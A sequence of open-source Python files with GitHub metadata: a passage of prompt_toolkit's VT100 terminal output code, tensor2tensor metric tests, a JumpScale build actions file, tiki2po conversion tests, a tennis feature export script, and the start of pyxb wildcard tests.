code = BG_ANSI_COLORS[match]
else:
code = FG_ANSI_COLORS[match]
self[value] = code
return code, match
class _256ColorCache(dict):
"""
Cach which maps (r, g, b) tuples to 256 colors.
"""
def __init__(self):
# Build color table.
colors = []
# colors 0..15: 16 basic colors
colors.append((0x00, 0x00, 0x00)) # 0
colors.append((0xcd, 0x00, 0x00)) # 1
colors.append((0x00, 0xcd, 0x00)) # 2
colors.append((0xcd, 0xcd, 0x00)) # 3
colors.append((0x00, 0x00, 0xee)) # 4
colors.append((0xcd, 0x00, 0xcd)) # 5
colors.append((0x00, 0xcd, 0xcd)) # 6
colors.append((0xe5, 0xe5, 0xe5)) # 7
colors.append((0x7f, 0x7f, 0x7f)) # 8
colors.append((0xff, 0x00, 0x00)) # 9
colors.append((0x00, 0xff, 0x00)) # 10
colors.append((0xff, 0xff, 0x00)) # 11
colors.append((0x5c, 0x5c, 0xff)) # 12
colors.append((0xff, 0x00, 0xff)) # 13
colors.append((0x00, 0xff, 0xff)) # 14
colors.append((0xff, 0xff, 0xff)) # 15
# colors 16..232: the 6x6x6 color cube
valuerange = (0x00, 0x5f, 0x87, 0xaf, 0xd7, 0xff)
for i in range(217):
r = valuerange[(i // 36) % 6]
g = valuerange[(i // 6) % 6]
b = valuerange[i % 6]
colors.append((r, g, b))
# colors 233..253: grayscale
for i in range(1, 22):
v = 8 + i * 10
colors.append((v, v, v))
self.colors = colors
def __missing__(self, value):
r, g, b = value
# Find closest color.
# (Thanks to Pygments for this!)
distance = 257*257*3 # "infinity" (>distance from #000000 to #ffffff)
match = 0
for i, (r2, g2, b2) in enumerate(self.colors):
d = (r - r2) ** 2 + (g - g2) ** 2 + (b - b2) ** 2
if d < distance:
match = i
distance = d
# Turn color name into code.
self[value] = match
return match
_16_fg_colors = _16ColorCache(bg=False)
_16_bg_colors = _16ColorCache(bg=True)
_256_colors = _256ColorCache()
class _EscapeCodeCache(dict):
"""
Cache for VT100 escape codes. It maps
(fgcolor, bgcolor, bold, underline, reverse) tuples to VT100 escape sequences.
:param true_color: When True, use 24bit colors instead of 256 colors.
"""
def __init__(self, true_color=False, ansi_colors_only=False):
assert isinstance(true_color, bool)
self.true_color = true_color
self.ansi_colors_only = to_simple_filter(ansi_colors_only)
def __missing__(self, attrs):
fgcolor, bgcolor, bold, underline, italic, blink, reverse = attrs
parts = []
parts.extend(self._colors_to_code(fgcolor, bgcolor))
if bold:
parts.append('1')
if italic:
parts.append('3')
if blink:
parts.append('5')
if underline:
parts.append('4')
if reverse:
parts.append('7')
if parts:
result = '\x1b[0;' + ';'.join(parts) + 'm'
else:
result = '\x1b[0m'
self[attrs] = result
return result
def _color_name_to_rgb(self, color):
" Turn 'ffffff', into (0xff, 0xff, 0xff). "
try:
rgb = int(color, 16)
except ValueError:
raise
else:
r = (rgb >> 16) & 0xff
g = (rgb >> 8) & 0xff
b = rgb & 0xff
return r, g, b
def _colors_to_code(self, fg_color, bg_color):
" Return a tuple with the vt100 values that represent this color. "
# When requesting ANSI colors only, and both fg/bg color were converted
# to ANSI, ensure that the foreground and background color are not the
# same. (Unless they were explicitely defined to be the same color.)
fg_ansi = [()]
def get(color, bg):
table = BG_ANSI_COLORS if bg else FG_ANSI_COLORS
if color is None:
return ()
# 16 ANSI colors. (Given by name.)
elif color in table:
return (table[color], )
# RGB colors. (Defined as 'ffffff'.)
else:
try:
rgb = self._color_name_to_rgb(color)
except ValueError:
return ()
# When only 16 colors are supported, use that.
if self.ansi_colors_only():
if bg: # Background.
if fg_color != bg_color:
exclude = (fg_ansi[0], )
else:
exclude = ()
code, name = _16_bg_colors.get_code(rgb, exclude=exclude)
return (code, )
else: # Foreground.
code, name = _16_fg_colors.get_code(rgb)
fg_ansi[0] = name
return (code, )
# True colors. (Only when this feature is enabled.)
elif self.true_color:
r, g, b = rgb
return (48 if bg else 38, 2, r, g, b)
# 256 RGB colors.
else:
return (48 if bg else 38, 5, _256_colors[rgb])
result = []
result.extend(get(fg_color, False))
result.extend(get(bg_color, True))
return map(six.text_type, result)
def _get_size(fileno):
# Thanks to fabric (fabfile.org), and
# http://sqizit.bartletts.id.au/2011/02/14/pseudo-terminals-in-python/
"""
Get the size of this pseudo terminal.
:param fileno: stdout.fileno()
:returns: A (rows, cols) tuple.
"""
# Inline imports, because these modules are not available on Windows.
# (This file is used by ConEmuOutput, which is used on Windows.)
import fcntl
import termios
# Buffer for the C call
buf = array.array(b'h' if six.PY2 else u'h', [0, 0, 0, 0])
# Do TIOCGWINSZ (Get)
# Note: We should not pass 'True' as a fourth parameter to 'ioctl'. (True
# is the default.) This causes segmentation faults on some systems.
# See: https://github.com/jonathanslenders/python-prompt-toolkit/pull/364
fcntl.ioctl(fileno, termios.TIOCGWINSZ, buf)
# Return rows, cols
return buf[0], buf[1]
class Vt100_Output(Output):
"""
:param get_size: A callable which returns the `Size` of the output terminal.
:param stdout: Any object with has a `write` and `flush` method + an 'encoding' property.
:param true_color: Use 24bit color instead of 256 colors. (Can be a :class:`SimpleFilter`.)
When `ansi_colors_only` is set, only 16 colors are used.
:param ansi_colors_only: Restrict to 16 ANSI colors only.
:param term: The terminal environment variable. (xterm, xterm-256color, linux, ...)
:param write_binary: Encode the output before writing it. If `True` (the
default), the `stdout` object is supposed to expose an `encoding` attribute.
"""
def __init__(self, stdout, get_size, true_color=False,
ansi_colors_only=None, term=None, write_binary=True):
assert callable(get_size)
assert term is None or isinstance(term, six.text_type)
assert all(hasattr(stdout, a) for a in ('write', 'flush'))
if write_binary:
assert hasattr(stdout, 'encoding')
self._buffer = []
self.stdout = stdout
self.write_binary = write_binary
self.get_size = get_size
self.true_color = to_simple_filter(true_color)
self.term = term or 'xterm'
# ANSI colors only?
if ansi_colors_only is None:
# When not given, use the following default.
ANSI_COLORS_ONLY = bool(os.environ.get(
'PROMPT_TOOLKIT_ANSI_COLORS_ONLY', False))
@Condition
def ansi_colors_only():
return ANSI_COLORS_ONLY or term in ('linux', 'eterm-color')
else:
ansi_colors_only = to_simple_filter(ansi_colors_only)
self.ansi_colors_only = ansi_colors_only
# Cache for escape codes.
self._escape_code_cache = _EscapeCodeCache(ansi_colors_only=ansi_colors_only)
self._escape_code_cache_true_color = _EscapeCodeCache(
true_color=True, ansi_colors_only=ansi_colors_only)
@classmethod
def from_pty(cls, stdout, true_color=False, ansi_colors_only=None, term=None):
"""
Create an Output class from a pseudo terminal.
(This will take the dimensions by reading the pseudo
terminal attributes.)
"""
assert stdout.isatty()
def get_size():
rows, columns = _get_size(stdout.fileno())
return Size(rows=rows, columns=columns)
return cls(stdout, get_size, true_color=true_color,
ansi_colors_only=ansi_colors_only, term=term)
def fileno(self):
" Return file descriptor. "
return self.stdout.fileno()
def encoding(self):
" Return encoding used for stdout. "
return self.stdout.encoding
def write_raw(self, data):
"""
Write raw data to output.
"""
self._buffer.append(data)
def write(self, data):
"""
Write text to output.
(Removes vt100 escape codes. -- used for safely writing text.)
"""
self._buffer.append(data.replace('\x1b', '?'))
def set_title(self, title):
"""
Set terminal title.
"""
if self.term not in ('linux', 'eterm-color'): # Not supported by the Linux console.
self.write_raw('\x1b]2;%s\x07' % title.replace('\x1b', '').replace('\x07', ''))
def clear_title(self):
self.set_title('')
def erase_screen(self):
"""
Erases the screen with the background colour and moves the cursor to
home.
"""
self.write_raw('\x1b[2J')
def enter_alternate_screen(self):
self.write_raw('\x1b[?1049h\x1b[H')
def quit_alternate_screen(self):
self.write_raw('\x1b[?1049l')
def enable_mouse_support(self):
self.write_raw('\x1b[?1000h')
# Enable urxvt Mouse mode. (For terminals that understand this.)
self.write_raw('\x1b[?1015h')
# Also enable Xterm SGR mouse mode. (For terminals that understand this.)
self.write_raw('\x1b[?1006h')
# Note: E.g. lxterminal understands 1000h, but not the urxvt or sgr
# extensions.
def disable_mouse_support(self):
self.write_raw('\x1b[?1000l')
self.write_raw('\x1b[?1015l')
self.write_raw('\x1b[?1006l')
def erase_end_of_line(self):
"""
Erases from the current cursor position to the end of the current line.
"""
self.write_raw('\x1b[K')
def erase_down(self):
"""
Erases the screen from the current line down to the bottom of the
screen.
"""
self.write_raw('\x1b[J')
def reset_attributes(self):
self.write_raw('\x1b[0m')
def set_attributes(self, attrs):
"""
Create new style and output.
:param attrs: `Attrs` instance.
"""
if self.true_color() and not self.ansi_colors_only():
self.write_raw(self._escape_code_cache_true_color[attrs])
else:
self.write_raw(self._escape_code_cache[attrs])
def disable_autowrap(self):
self.write_raw('\x1b[?7l')
def enable_autowrap(self):
self.write_raw('\x1b[?7h')
def enable_bracketed_paste(self):
self.write_raw('\x1b[?2004h')
def disable_bracketed_paste(self):
self.write_raw('\x1b[?2004l')
def cursor_goto(self, row=0, column=0):
""" Move cursor position. """
self.write_raw('\x1b[%i;%iH' % (row, column))
def cursor_up(self, amount):
if amount == 0:
pass
elif amount == 1:
self.write_raw('\x1b[A')
else:
self.write_raw('\x1b[%iA' % amount)
def cursor_down(self, amount):
if amount == 0:
pass
elif amount == 1:
# Note: Not the same as '\n', '\n' can cause the window content to
# scroll.
self.write_raw('\x1b[B')
else:
self.write_raw('\x1b[%iB' % amount)
def cursor_forward(self, amount):
if amount == 0:
pass
elif amount == 1:
self.write_raw('\x1b[C')
else:
self.write_raw('\x1b[%iC' % amount)
def cursor_backward(self, amount):
if amount == 0:
pass
elif amount == 1:
self.write_raw('\b') # '\x1b[D'
else:
self.write_raw('\x1b[%iD' % amount)
def hide_cursor(self):
self.write_raw('\x1b[?25l')
def show_cursor(self):
self.write_raw('\x1b[?12l\x1b[?25h') # Stop blinking cursor and show.
def flush(self):
"""
Write to output stream and flush.
"""
if not self._buffer:
return
data = ''.join(self._buffer)
try:
# (We try to encode ourself, because that way we can replace
# characters that don't exist in the character set, avoiding
# UnicodeEncodeError crashes. E.g. u'\xb7' does not appear in 'ascii'.)
# My Arch Linux installation of july 2015 reported 'ANSI_X3.4-1968'
# for sys.stdout.encoding in xterm.
if self.write_binary:
if hasattr(self.stdout, 'buffer'):
out = self.stdout.buffer # Py3.
else:
out = self.stdout
out.write(data.encode(self.stdout.encoding or 'utf-8', 'replace'))
else:
self.stdout.write(data)
self.stdout.flush()
except IOError as e:
if e.args and e.args[0] == errno.EINTR:
# Interrupted system call. Can happpen in case of a window
# resize signal. (Just ignore. The resize handler will render
# again anyway.)
pass
elif e.args and e.args[0] == 0:
# This can happen when there is a lot of output and the user
# sends a KeyboardInterrupt by pressing Control-C. E.g. in
# a Python REPL when we execute "while True: print('test')".
# (The `ptpython` REPL uses this `Output` class instead of
# `stdout` directly -- in order to be network transparent.)
# So, just ignore.
pass
else:
raise
self._buffer = []
def ask_for_cpr(self):
"""
Asks for a cursor position report (CPR).
"""
self.write_raw('\x1b[6n')
self.flush()
def bell(self):
" Sound bell. "
self.write_raw('\a')
self.flush()
|
{
"content_hash": "dec758fdccb52c8fd8f1857f4819512a",
"timestamp": "",
"source": "github",
"line_count": 630,
"max_line_length": 95,
"avg_line_length": 31.214285714285715,
"alnum_prop": 0.5445715738621917,
"repo_name": "lancezlin/ml_template_py",
"id": "4568ee3c2b3b4a3f7a9f9fe5cbcf2a9c8e382259",
"size": "19665",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "lib/python2.7/site-packages/prompt_toolkit/terminal/vt100_output.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "326933"
},
{
"name": "C++",
"bytes": "14430"
},
{
"name": "CSS",
"bytes": "7806"
},
{
"name": "FORTRAN",
"bytes": "3200"
},
{
"name": "HTML",
"bytes": "596861"
},
{
"name": "JavaScript",
"bytes": "4020233"
},
{
"name": "Jupyter Notebook",
"bytes": "517957"
},
{
"name": "Objective-C",
"bytes": "567"
},
{
"name": "Python",
"bytes": "41191064"
},
{
"name": "Shell",
"bytes": "3373"
},
{
"name": "Smarty",
"bytes": "26298"
}
],
"symlink_target": ""
}
|
"""Tests for tensor2tensor.utils.metrics."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensor2tensor.utils import metrics
import tensorflow as tf
class MetricsTest(tf.test.TestCase):
def testAccuracyMetric(self):
predictions = np.random.randint(1, 5, size=(12, 12, 12, 1))
targets = np.random.randint(1, 5, size=(12, 12, 12, 1))
expected = np.mean((predictions == targets).astype(float))
with self.test_session() as session:
scores, _ = metrics.padded_accuracy(
tf.one_hot(predictions, depth=5, dtype=tf.float32),
tf.constant(targets, dtype=tf.int32))
a = tf.reduce_mean(scores)
session.run(tf.global_variables_initializer())
actual = session.run(a)
self.assertAlmostEqual(actual, expected)
def testAccuracyTopKMetric(self):
predictions = np.random.randint(1, 5, size=(12, 12, 12, 1))
targets = np.random.randint(1, 5, size=(12, 12, 12, 1))
expected = np.mean((predictions == targets).astype(float))
with self.test_session() as session:
predicted = tf.one_hot(predictions, depth=5, dtype=tf.float32)
scores1, _ = metrics.padded_accuracy_topk(
predicted, tf.constant(targets, dtype=tf.int32), k=1)
scores2, _ = metrics.padded_accuracy_topk(
predicted, tf.constant(targets, dtype=tf.int32), k=7)
a1 = tf.reduce_mean(scores1)
a2 = tf.reduce_mean(scores2)
session.run(tf.global_variables_initializer())
actual1, actual2 = session.run([a1, a2])
self.assertAlmostEqual(actual1, expected)
self.assertAlmostEqual(actual2, 1.0)
def testSequenceAccuracyMetric(self):
predictions = np.random.randint(4, size=(12, 12, 12, 1))
targets = np.random.randint(4, size=(12, 12, 12, 1))
expected = np.mean(
np.prod((predictions == targets).astype(float), axis=(1, 2)))
with self.test_session() as session:
scores, _ = metrics.padded_sequence_accuracy(
tf.one_hot(predictions, depth=4, dtype=tf.float32),
tf.constant(targets, dtype=tf.int32))
a = tf.reduce_mean(scores)
session.run(tf.global_variables_initializer())
actual = session.run(a)
self.assertEqual(actual, expected)
def testRMSEMetric(self):
predictions = np.full((10, 1), 1) # All 1's
targets = np.full((10, 1), 3) # All 3's
expected = np.sqrt(np.mean((predictions - targets)**2)) # RMSE = 2.0
with self.test_session() as session:
rmse, _ = metrics.padded_rmse(
tf.constant(predictions, dtype=tf.int32),
tf.constant(targets, dtype=tf.int32))
session.run(tf.global_variables_initializer())
actual = session.run(rmse)
self.assertEqual(actual, expected)
def testSequenceEditDistanceMetric(self):
predictions = np.array([[3, 4, 5, 1, 0, 0],
[2, 1, 3, 4, 0, 0],
[2, 1, 3, 4, 0, 0]])
# Targets are just a bit different:
# - first sequence has a different prediction
# - second sequence has a different prediction and one extra step
# - third sequence is identical
targets = np.array([[5, 4, 5, 1, 0, 0],
[2, 5, 3, 4, 1, 0],
[2, 1, 3, 4, 0, 0]])
# Reshape to match expected input format by metric fns.
predictions = np.reshape(predictions, [3, 6, 1, 1])
targets = np.reshape(targets, [3, 6, 1, 1])
with self.test_session() as session:
scores, weight = metrics.sequence_edit_distance(
tf.one_hot(predictions, depth=6, dtype=tf.float32),
tf.constant(targets, dtype=tf.int32))
session.run(tf.global_variables_initializer())
actual_scores, actual_weight = session.run([scores, weight])
self.assertAlmostEqual(actual_scores, 3.0 / 13)
self.assertEqual(actual_weight, 13)
def testNegativeLogPerplexity(self):
predictions = np.random.randint(4, size=(12, 12, 12, 1))
targets = np.random.randint(4, size=(12, 12, 12, 1))
with self.test_session() as session:
scores, _ = metrics.padded_neg_log_perplexity(
tf.one_hot(predictions, depth=4, dtype=tf.float32),
tf.constant(targets, dtype=tf.int32))
a = tf.reduce_mean(scores)
session.run(tf.global_variables_initializer())
actual = session.run(a)
self.assertEqual(actual.shape, ())
def testSigmoidAccuracyOneHot(self):
logits = np.array([
[-1., 1.],
[1., -1.],
[-1., 1.],
[1., -1.]
])
labels = np.array([
[0, 1],
[1, 0],
[1, 0],
[0, 1]
])
logits = np.expand_dims(np.expand_dims(logits, 1), 1)
labels = np.expand_dims(np.expand_dims(labels, 1), 1)
with self.test_session() as session:
score, _ = metrics.sigmoid_accuracy_one_hot(logits, labels)
session.run(tf.global_variables_initializer())
session.run(tf.local_variables_initializer())
s = session.run(score)
self.assertEqual(s, 0.5)
def testSigmoidPrecisionOneHot(self):
logits = np.array([
[-1., 1.],
[1., -1.],
[1., -1.],
[1., -1.]
])
labels = np.array([
[0, 1],
[0, 1],
[0, 1],
[0, 1]
])
logits = np.expand_dims(np.expand_dims(logits, 1), 1)
labels = np.expand_dims(np.expand_dims(labels, 1), 1)
with self.test_session() as session:
score, _ = metrics.sigmoid_precision_one_hot(logits, labels)
session.run(tf.global_variables_initializer())
session.run(tf.local_variables_initializer())
s = session.run(score)
self.assertEqual(s, 0.25)
def testSigmoidRecallOneHot(self):
logits = np.array([
[-1., 1.],
[1., -1.],
[1., -1.],
[1., -1.]
])
labels = np.array([
[0, 1],
[0, 1],
[0, 1],
[0, 1]
])
logits = np.expand_dims(np.expand_dims(logits, 1), 1)
labels = np.expand_dims(np.expand_dims(labels, 1), 1)
with self.test_session() as session:
score, _ = metrics.sigmoid_recall_one_hot(logits, labels)
session.run(tf.global_variables_initializer())
session.run(tf.local_variables_initializer())
s = session.run(score)
self.assertEqual(s, 0.25)
def testSigmoidCrossEntropyOneHot(self):
logits = np.array([
[-1., 1.],
[1., -1.],
[1., -1.],
[1., -1.]
])
labels = np.array([
[0, 1],
[1, 0],
[0, 0],
[0, 1]
])
logits = np.expand_dims(np.expand_dims(logits, 1), 1)
labels = np.expand_dims(np.expand_dims(labels, 1), 1)
with self.test_session() as session:
score, _ = metrics.sigmoid_cross_entropy_one_hot(logits, labels)
session.run(tf.global_variables_initializer())
session.run(tf.local_variables_initializer())
s = session.run(score)
self.assertAlmostEqual(s, 0.688, places=3)
def testRocAuc(self):
logits = np.array([
[-1., 1.],
[1., -1.],
[1., -1.],
[1., -1.]
])
labels = np.array([
[1],
[0],
[1],
[0]
])
logits = np.expand_dims(np.expand_dims(logits, 1), 1)
labels = np.expand_dims(np.expand_dims(labels, 1), 1)
with self.test_session() as session:
score, _ = metrics.roc_auc(logits, labels)
session.run(tf.global_variables_initializer())
session.run(tf.local_variables_initializer())
s = session.run(score)
self.assertAlmostEqual(s, 0.750, places=3)
def testMultilabelMatch3(self):
predictions = np.random.randint(1, 5, size=(100, 1, 1, 1))
targets = np.random.randint(1, 5, size=(100, 10, 1, 1))
weights = np.random.randint(0, 2, size=(100, 1, 1, 1))
targets *= weights
predictions_repeat = np.repeat(predictions, 10, axis=1)
expected = (predictions_repeat == targets).astype(float)
expected = np.sum(expected, axis=(1, 2, 3))
expected = np.minimum(expected / 3.0, 1.)
expected = np.sum(expected * weights[:, 0, 0, 0]) / weights.shape[0]
with self.test_session() as session:
scores, weights_ = metrics.multilabel_accuracy_match3(
tf.one_hot(predictions, depth=5, dtype=tf.float32),
tf.constant(targets, dtype=tf.int32))
a, a_op = tf.metrics.mean(scores, weights_)
session.run(tf.local_variables_initializer())
session.run(tf.global_variables_initializer())
_ = session.run(a_op)
actual = session.run(a)
self.assertAlmostEqual(actual, expected, places=6)
if __name__ == '__main__':
tf.test.main()
|
{
"content_hash": "3e3857279f9c8aac089a6e3f7d50343f",
"timestamp": "",
"source": "github",
"line_count": 244,
"max_line_length": 73,
"avg_line_length": 35.217213114754095,
"alnum_prop": 0.5982776678691959,
"repo_name": "vthorsteinsson/tensor2tensor",
"id": "3e504d88112aa02200f63e50f5c946e31d774120",
"size": "9198",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensor2tensor/utils/metrics_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "34646"
},
{
"name": "JavaScript",
"bytes": "78396"
},
{
"name": "Jupyter Notebook",
"bytes": "2423366"
},
{
"name": "Python",
"bytes": "3566836"
},
{
"name": "Shell",
"bytes": "7888"
}
],
"symlink_target": ""
}
|
def init(job):
from JumpScale.baselib.atyourservice81.AtYourServiceBuild import ensure_container
ensure_container(job.service, root=False)
def install(job):
from JumpScale.baselib.atyourservice81.AtYourServiceBuild import build
def build_func(cuisine):
cuisine.systemservices.aydostor.build(start=False)
build(job.service, build_func)
|
{
"content_hash": "2238591cb86e443f1b3f6cfbed2683d7",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 85,
"avg_line_length": 30.583333333333332,
"alnum_prop": 0.7683923705722071,
"repo_name": "Jumpscale/ays_build",
"id": "e5a3e529661e45a53723f416306675b223bc5119",
"size": "367",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "actorTemplates/store/actions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "21616"
}
],
"symlink_target": ""
}
|
from translate.convert import tiki2po
from translate.storage import tiki
from translate.convert import test_convert
from translate.misc import wStringIO
class TestTiki2Po:
def test_converttiki_defaults(self):
inputfile = """
"zero_source" => "zero_target",
// ### Start of unused words
"one_source" => "one_target",
// ### end of unused words
"""
outputfile = wStringIO.StringIO()
tiki2po.converttiki(inputfile, outputfile)
output = outputfile.getvalue()
assert '#: translated' in output
assert 'msgid "zero_source"' in output
assert "one_source" not in output
def test_converttiki_includeunused(self):
inputfile = """
"zero_source" => "zero_target",
// ### Start of unused words
"one_source" => "one_target",
// ### end of unused words
"""
outputfile = wStringIO.StringIO()
tiki2po.converttiki(inputfile, outputfile, includeunused=True)
output = outputfile.getvalue()
assert '#: translated' in output
assert 'msgid "zero_source"' in output
assert '#: unused' in output
assert 'msgid "one_source"' in output
class TestTiki2PoCommand(test_convert.TestConvertCommand, TestTiki2Po):
"""Tests running actual tiki2po commands on files"""
convertmodule = tiki2po
defaultoptions = {}
def test_help(self):
"""tests getting help"""
options = test_convert.TestConvertCommand.test_help(self)
options = self.help_check(options, "--include-unused")
|
{
"content_hash": "a21a37cd49739a20c8c119ccc7908ad7",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 71,
"avg_line_length": 31.244897959183675,
"alnum_prop": 0.6557805355976486,
"repo_name": "dbbhattacharya/kitsune",
"id": "8024b4185f7899ebcdd70a2e170ee891436256b0",
"size": "1664",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "vendor/packages/translate-toolkit/translate/convert/test_tiki2po.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "2694"
},
{
"name": "CSS",
"bytes": "276585"
},
{
"name": "HTML",
"bytes": "600145"
},
{
"name": "JavaScript",
"bytes": "800276"
},
{
"name": "Python",
"bytes": "2762831"
},
{
"name": "Shell",
"bytes": "6720"
},
{
"name": "Smarty",
"bytes": "1752"
}
],
"symlink_target": ""
}
|
'''
This program sets up the feature input files to the HDF5 converter from S2S from VEN
Run feature_combine.py first
Uses splits from split_dir
Uses individual numpy (.npy) features from npy_path
Writes out tennis_allframes_tennis002_layer_split.txt annotation files ready for HDF5 conversion
'''
import numpy as np
import os
from os import listdir
from os.path import isfile, join
import utilities.paths as paths
DRIVE = paths.get_drive()
MODELS = ['MVCD003_02']
LAYERS = ['fc6', 'fc7','pool5']
LAYERS = ['fc7']
# LAYERS = ['pool5']
CLASSES = ['Point']
SPLITS = ['Train','Val','Test']
SPLIT = 'S005'
for _class in CLASSES:
for model in MODELS:
for layer in LAYERS:
print '*******'*20
print layer
save_path = "%sDATASETS/VIDEO/TENNIS/FEATURES/CLASSES/%s/%s/%s/txt2/" % (DRIVE, _class, model, layer)
if not os.path.exists(save_path):
os.makedirs(save_path)
with open("%sall.txt" % (save_path), 'a') as f_all:
# Read Splits File
for _split in SPLITS:
print _split
with open("%sDATASETS/VIDEO/TENNIS/SPLITS/%s/CLASSES/%s_splits.txt" % (DRIVE, SPLIT, _class), 'r') as f:
files = f.readlines()
do = []
for file in files:
if _split.lower() in file.split("\t")[1]:
do.append(file.split("\t")[0])
npy_path = "%sDATASETS/VIDEO/TENNIS/FEATURES/CLASSES/%s/%s/%s/npy/" % (DRIVE, _class, model, layer)
for file in do:
npy_feats = np.load(npy_path + file + '.npy')
# tmp = []
# for i in range(len(npy_feats)):
# tmp.append(npy_feats[i])
# npy_feats = tmp
###############################if int(file[2:])<200: # edit to make dataset size 200 max
print file
# print np.shape(npy_feats)
for frame in range(np.shape(npy_feats)[0]):
out_str = file + '_frame_' + str(frame+1) + ',' + ",".join(map(str, npy_feats[frame])) + "\n"
# print out_str
f_all.writelines(out_str)
with open("%s%s.txt" % (save_path, _split.lower()), 'a') as f_split:
f_split.writelines(out_str)
|
{
"content_hash": "d83f95ec576f77388be54b5f43efd156",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 124,
"avg_line_length": 38.45454545454545,
"alnum_prop": 0.48857368006304175,
"repo_name": "HaydenFaulkner/phd",
"id": "3ba143181a066afe84c3fa5d42556d70ec7c7272",
"size": "2538",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "processing/feature/feats_npy2txt.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1243227"
}
],
"symlink_target": ""
}
|
import logging
if __name__ == '__main__':
logging.basicConfig()
_log = logging.getLogger(__name__)
import pyxb.binding.generate
import pyxb.utils.domutils
from xml.dom import Node
import os.path
schema_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../schemas/test-wildcard.xsd'))
code = pyxb.binding.generate.GeneratePython(schema_location=schema_path)
rv = compile(code, 'test', 'exec')
eval(rv)
from pyxb.exceptions_ import *
import unittest
def nc_not (ns_or_absent):
return ( pyxb.xmlschema.structures.Wildcard.NC_not, ns_or_absent )
class TestIntensionalSet (unittest.TestCase):
def testTest (self):
ns = 'URN:namespace'
not_nc = nc_not(ns)
self.assertTrue(isinstance(not_nc, tuple))
self.assertEqual(2, len(not_nc))
self.assertEqual(pyxb.xmlschema.structures.Wildcard.NC_not, not_nc[0])
self.assertEqual(ns, not_nc[1])
def testUnion_1 (self):
UNION = pyxb.xmlschema.structures.Wildcard.IntensionalUnion
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(nc_any, UNION([ nc_any, nc_any ]))
self.assertEqual(nc_not(ns1), UNION([ nc_not(ns1), nc_not(ns1) ]))
self.assertEqual(set([ns1]), UNION([ set([ns1]), set([ns1]) ]))
def testUnion_2 (self):
UNION = pyxb.xmlschema.structures.Wildcard.IntensionalUnion
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(nc_any, UNION([ nc_any, set([ns1]) ]))
self.assertEqual(nc_any, UNION([ nc_any, nc_not(ns1) ]))
self.assertEqual(nc_any, UNION([ nc_any, nc_not(None) ]))
def testUnion_3 (self):
UNION = pyxb.xmlschema.structures.Wildcard.IntensionalUnion
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(set([ns1, ns2]), UNION([set([ns1]), set([ns2])]))
self.assertEqual(set([None, ns1]), UNION([set([None]), set([ns1])]))
self.assertEqual(set([None]), UNION([set([None]), set([None])]))
def testUnion_4 (self):
UNION = pyxb.xmlschema.structures.Wildcard.IntensionalUnion
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(nc_not(None), UNION([nc_not(ns1), nc_not(ns2)]))
self.assertEqual(nc_not(None), UNION([nc_not(ns1), nc_not(None)]))
def testUnion_5 (self):
UNION = pyxb.xmlschema.structures.Wildcard.IntensionalUnion
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(nc_any, UNION([nc_not(ns1), set([ns1, None])])) # 5.1
self.assertEqual(nc_not(None), UNION([nc_not(ns1), set([ns1, ns2])])) # 5.2
self.assertRaises(SchemaValidationError, UNION, [nc_not(ns1), set([None, ns2])]) # 5.3
self.assertEqual(nc_not(ns1), UNION([nc_not(ns1), set([ns2])])) # 5.4
def testUnion_6 (self):
UNION = pyxb.xmlschema.structures.Wildcard.IntensionalUnion
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(nc_any, UNION([nc_not(None), set([ns1, ns2, None])])) # 6.1
self.assertEqual(nc_not(None), UNION([nc_not(None), set([ns1, ns2])])) # 6.2
def testIntersection_1 (self):
ISECT = pyxb.xmlschema.structures.Wildcard.IntensionalIntersection
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(nc_any, ISECT([ nc_any, nc_any ]))
self.assertEqual(nc_not(ns1), ISECT([ nc_not(ns1), nc_not(ns1) ]))
self.assertEqual(set([ns1]), ISECT([ set([ns1]), set([ns1]) ]))
def testIntersection_2 (self):
ISECT = pyxb.xmlschema.structures.Wildcard.IntensionalIntersection
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(set([ns1]), ISECT([ nc_any, set([ns1]) ]))
self.assertEqual(nc_not(ns1), ISECT([ nc_any, nc_not(ns1) ]))
self.assertEqual(nc_not(None), ISECT([ nc_any, nc_not(None) ]))
def testIntersection_3 (self):
ISECT = pyxb.xmlschema.structures.Wildcard.IntensionalIntersection
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
self.assertEqual(set([ns2]), ISECT([nc_not(ns1), set([ns1, ns2, None])]))
self.assertEqual(set([ns2]), ISECT([nc_not(ns1), set([ns1, ns2])]))
self.assertEqual(set([ns2]), ISECT([nc_not(ns1), set([ns2])]))
def testIntersection_4 (self):
ISECT = pyxb.xmlschema.structures.Wildcard.IntensionalIntersection
nc_any = pyxb.xmlschema.structures.Wildcard.NC_any
ns1 = 'URN:first'
ns2 = 'URN:second'
